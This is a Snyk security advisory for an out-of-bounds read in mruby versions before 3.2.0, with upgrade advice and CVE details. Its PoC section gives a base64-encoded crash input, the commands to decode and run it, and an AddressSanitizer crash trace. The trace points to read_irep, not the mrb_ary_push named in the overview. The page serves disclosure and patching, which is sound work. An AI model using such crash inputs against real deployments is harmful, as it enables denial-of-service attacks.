Out-of-bounds Read Affecting mruby/mruby package, versions [,3.2.0)
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-UNMANAGED-MRUBYMRUBY-5498638
- published8 May 2023
- disclosed8 May 2023
- creditalkyne Choi
Introduced: 8 May 2023
CVE-2022-0525 (opens in a new tab)How to fix?
Upgrade mruby/mruby to version 3.2.0 or higher.
Overview
Affected versions of this package are vulnerable to Out-of-bounds Read in mrb_ary_push.
PoC
$ echo -ne "bAticjWSUkRPTkxZC2I9e30MWyohMCxtOjAwLG06MF09MXxbKiEwLG0wXQo=" |base64 -d > poc
# ASAN
$ ./bin/mruby ./poc
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1083503==ERROR: AddressSanitizer: SEGV on unknown address 0x60c02621407a (pc 0x7f61ffbded80 bp 0x7ffcc7e4fc60 sp 0x7ffcc7e4f3f8 T0)
==1083503==The signal is caused by a READ memory access.
#0 0x7f61ffbded80 /build/glibc-eX1tMB/glibc-2.31/string/../sysdeps/x86_64/multiarch/memcmp-avx2-movbe.S:182
#1 0x435d3e in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long) (/home/alkyne/fuzzing/mruby-asan/bin/mruby+0x435d3e)
#2 0x4360b9 in __interceptor_memcmp (/home/alkyne/fuzzing/mruby-asan/bin/mruby+0x4360b9)
#3 0x4d43b1 in read_irep /home/alkyne/fuzzing/mruby-asan/src/load.c:582:9
#4 0x4d2aa9 in mrb_proc_read_irep_buf /home/alkyne/fuzzing/mruby-asan/src/load.c:621:10
#5 0x4d333d in mrb_load_irep_buf_cxt /home/alkyne/fuzzing/mruby-asan/src/load.c:662:25
#6 0x698007 in mrb_load_detect_file_cxt /home/alkyne/fuzzing/mruby-asan/mrbgems/mruby-compiler/core/parse.y:6945:14
#7 0x4cf804 in main /home/alkyne/fuzzing/mruby-asan/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347:11
#8 0x7f61ffa7e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#9 0x41d6ed in _start (/home/alkyne/fuzzing/mruby-asan/bin/mruby+0x41d6ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/glibc-eX1tMB/glibc-2.31/string/../sysdeps/x86_64/multiarch/memcmp-avx2-movbe.S:182
==1083503==ABORTING